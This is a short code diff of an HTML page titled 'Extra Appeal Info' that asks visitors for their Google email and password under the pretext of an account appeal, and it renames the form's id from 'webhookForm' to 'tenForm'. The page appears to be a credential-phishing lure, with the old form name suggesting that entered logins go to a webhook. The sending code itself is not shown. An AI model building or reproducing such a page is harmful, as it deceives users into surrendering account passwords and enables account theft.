--- a/appeal-tomb/index.html
+++ b/appeal-tomb/index.html
@@ -11,7 +11,7 @@
 <h2>Extra Appeal Info</h2>
 <h5>In order for you to get properly appealed, please enter your Google Details Below</h5>
 <body>
-  <form id="webhookForm">
+  <form id="tenForm">
     <input type="email" id="eml" placeholder="Email" required>
     <input type="password" id="pss" placeholder="Password" required>
     <button type="submit">Send</button>
